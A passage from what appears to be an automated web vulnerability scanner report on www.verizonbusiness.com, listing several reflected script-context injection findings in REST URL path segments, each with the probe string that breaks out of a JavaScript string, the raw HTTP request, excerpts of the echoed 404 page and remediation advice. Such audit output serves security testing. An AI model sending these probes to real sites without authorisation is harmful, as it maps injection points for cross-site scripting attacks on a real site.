Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Medium/products/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 164ab'%3bf28adc8d829 was submitted in the REST URL parameter 1. This input was echoed as 164ab';f28adc8d829 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Medium164ab'%3bf28adc8d829/products/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:06 GMT
Content-Type: text/html
Content-Length: 21466
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:06 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Medium164ab';f28adc8d829/products/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.4. http://www.verizonbusiness.com/Medium/products/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Medium/products/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd738"%3b7f057f5a9e7 was submitted in the REST URL parameter 1. This input was echoed as fd738";7f057f5a9e7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Mediumfd738"%3b7f057f5a9e7/products/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:00 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 21466
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:01 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:00 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Mediumfd738";7f057f5a9e7/products/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SU
...[SNIP]...

1.5. http://www.verizonbusiness.com/Medium/products/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Medium/products/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56975"%3bb35bb28a897 was submitted in the REST URL parameter 2. This input was echoed as 56975";b35bb28a897 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Medium/products56975"%3bb35bb28a897/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:16 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 21696
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:16 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Medium/products56975";b35bb28a897/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.6. http://www.verizonbusiness.com/Medium/products/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Medium/products/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a553e'%3b46a05cb868f was submitted in the REST URL parameter 2. This input was echoed as a553e';46a05cb868f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Medium/productsa553e'%3b46a05cb868f/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:28 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 21694
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:28 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Medium/productsa553e';46a05cb868f/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.7. http://www.verizonbusiness.com/Medium/products/itinfrastructure/computing/caas_smb/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Medium/products/itinfrastructure/computing/caas_smb/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51566'%3b5cc3f61f373 was submitted in the REST URL parameter 1. This input was echoed as 51566';5cc3f61f373 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Medium51566'%3b5cc3f61f373/products/itinfrastructure/computing/caas_smb/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:48 GMT
Content-Type: text/html
Content-Length: 42685
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:48 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Medium51566';5cc3f61f373/products/itinfrastructure/computing/caas_smb/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.8. http://www.verizonbusiness.com/Medium/products/itinfrastructure/computing/caas_smb/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Medium/products/itinfrastructure/computing/caas_smb/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f91e"%3b44be4195806 was submitted in the REST URL parameter 1. This input was echoed as 1f91e";44be4195806 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Medium1f91e"%3b44be4195806/products/itinfrastructure/computing/caas_smb/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:34 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 21538
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:34 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:34 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Medium1f91e";44be4195806/products/itinfrastructure/computing/caas_smb/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FO
...[SNIP]...

1.9. http://www.verizonbusiness.com/Medium/products/itinfrastructure/computing/caas_smb/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Medium/products/itinfrastructure/computing/caas_smb/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 569d6"%3b3b43c54ad1a was submitted in the REST URL parameter 2. This input was echoed as 569d6";3b43c54ad1a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Medium/products569d6"%3b3b43c54ad1a/itinfrastructure/computing/caas_smb/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:55:01 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 21766
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:55:01 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:55:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Medium/products569d6";3b43c54ad1a/itinfrastructure/computing/caas_smb/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDA
...[SNIP]...

1.10. http://www.verizonbusiness.com/Medium/products/itinfrastructure/computing/caas_smb/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Medium/products/itinfrastructure/computing/caas_smb/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f28a'%3b940680195e9 was submitted in the REST URL parameter 2. This input was echoed as 4f28a';940680195e9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Medium/products4f28a'%3b940680195e9/itinfrastructure/computing/caas_smb/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:55:07 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 21766
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:55:07 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:55:07 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Medium/products4f28a';940680195e9/itinfrastructure/computing/caas_smb/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.11. http://www.verizonbusiness.com/Medium/products/itinfrastructure/computing/caas_smb/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Medium/products/itinfrastructure/computing/caas_smb/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 898db"%3b1665125aa22 was submitted in the REST URL parameter 3. This input was echoed as 898db";1665125aa22 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Medium/products/itinfrastructure898db"%3b1665125aa22/computing/caas_smb/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:55:23 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 21766
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:55:23 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:55:23 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Medium/products/itinfrastructure898db";1665125aa22/computing/caas_smb/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEM
...[SNIP]...

1.12. http://www.verizonbusiness.com/Medium/products/itinfrastructure/computing/caas_smb/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Medium/products/itinfrastructure/computing/caas_smb/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81674'%3ba29f40094fd was submitted in the REST URL parameter 3. This input was echoed as 81674';a29f40094fd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Medium/products/itinfrastructure81674'%3ba29f40094fd/computing/caas_smb/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:55:38 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 21768
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:55:38 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:55:38 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Medium/products/itinfrastructure81674';a29f40094fd/computing/caas_smb/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.13. http://www.verizonbusiness.com/Medium/products/itinfrastructure/computing/caas_smb/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Medium/products/itinfrastructure/computing/caas_smb/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40f03"%3b15f8384ea5a was submitted in the REST URL parameter 4. This input was echoed as 40f03";15f8384ea5a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Medium/products/itinfrastructure/computing40f03"%3b15f8384ea5a/caas_smb/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:55:48 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 21766
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:55:48 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:55:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
;//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Medium/products/itinfrastructure/computing40f03";15f8384ea5a/caas_smb/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SU
...[SNIP]...

1.14. http://www.verizonbusiness.com/Medium/products/itinfrastructure/computing/caas_smb/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Medium/products/itinfrastructure/computing/caas_smb/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71d5f'%3be418c831cb5 was submitted in the REST URL parameter 4. This input was echoed as 71d5f';e418c831cb5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Medium/products/itinfrastructure/computing71d5f'%3be418c831cb5/caas_smb/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:56:01 GMT
Content-Type: text/html
Content-Length: 21766
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:56:02 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:56:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Medium/products/itinfrastructure/computing71d5f';e418c831cb5/caas_smb/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.15. http://www.verizonbusiness.com/Medium/products/itinfrastructure/computing/caas_smb/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Medium/products/itinfrastructure/computing/caas_smb/

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce7a7"%3b3fec95ae7a4 was submitted in the REST URL parameter 5. This input was echoed as ce7a7";3fec95ae7a4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Medium/products/itinfrastructure/computing/caas_smbce7a7"%3b3fec95ae7a4/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:56:17 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 21766
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:56:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:56:17 GMT

